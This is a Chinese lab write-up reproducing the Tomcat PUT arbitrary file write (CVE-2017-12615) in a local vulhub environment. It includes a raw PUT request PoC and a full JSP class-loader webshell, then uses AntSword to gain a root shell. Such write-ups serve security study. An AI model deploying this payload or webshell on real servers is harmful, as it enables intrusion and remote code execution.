当前位置: 首页 > news >正文

Tomcat8 任意写文件PUT方法 (CVE-2017-12615)

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

    • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
      • 1 在线漏洞解读:
      • 2 版本影响
      • 3 环境搭建
      • 4 漏洞复现
        • 4.1 访问
        • 4.2 POC攻击点
          • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
          • 4.2.2 访问是否通,可以访问到文件
      • 5 漏洞利用
        • 5.1 上传jsp一句话
        • 5.2 kali打开蚁剑:
        • 5.3 连接jsp一句话木马,密码为 passwd
        • 5.4 打开终端,获取root

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -dsudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword 
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

http://www.lryc.cn/news/174911.html

相关文章:

  • SAP服务器修改主机名操作手册
  • 【大数据】Doris 构建实时数仓落地方案详解(一):实时数据仓库概述
  • C++ list容器的实现及讲解
  • 前端项目练习(练习-002-NodeJS项目初始化)
  • C++QT day11
  • Stable DIffusion 炫酷应用 | AI嵌入艺术字+光影光效
  • C#通过重写Panel改变边框颜色与宽度的方法
  • Vue2+ElementUI 静态首页案例
  • Linux的socket通信
  • MySQL学习大纲
  • 【Ambari】银河麒麟V10 ARM64架构_安装Ambari2.7.6HDP3.3.1(HiDataPlus)
  • 驱动开发练习,platform实现如下功能
  • QT之QString的用法介绍
  • 基于Java+SpringBoot+Vue3+Uniapp前后端分离考试学习一体机设计与实现2.0版本(视频讲解,已发布上线)
  • springboot 获取参数
  • 【笔记】离线Ubuntu20.04+mysql 5.7.36 + xtrabackup定时增量备份脚本
  • 树哈希与换根dp:CF763D
  • npm、yarn、pnpm如何清除缓存?
  • 12款最火的AI画图软件,助你探索创新设计
  • cookie信息无法获取问题研究
  • Linux:冯诺依曼系统和操作系统的概念
  • 【操作系统笔记十一】进程间通信
  • 【操作系统】聊聊Linux软中断
  • 公众号迁移个人可以迁移吗?
  • 全国职业技能大赛云计算--高职组赛题卷⑤(容器云)
  • 支撑位和阻力位在Renko和烛台图如何使用?FPmarkets澳福3秒回答
  • 如何在32位MCU用printf()函数打印64位数据
  • Python爬虫程序设置代理常见错误代码及解决方法
  • 3D点云目标检测:Centerformer训练waymo数据集
  • 火山引擎DataLeap推出两款大模型应用: 对话式检索与开发 打破代码语言屏障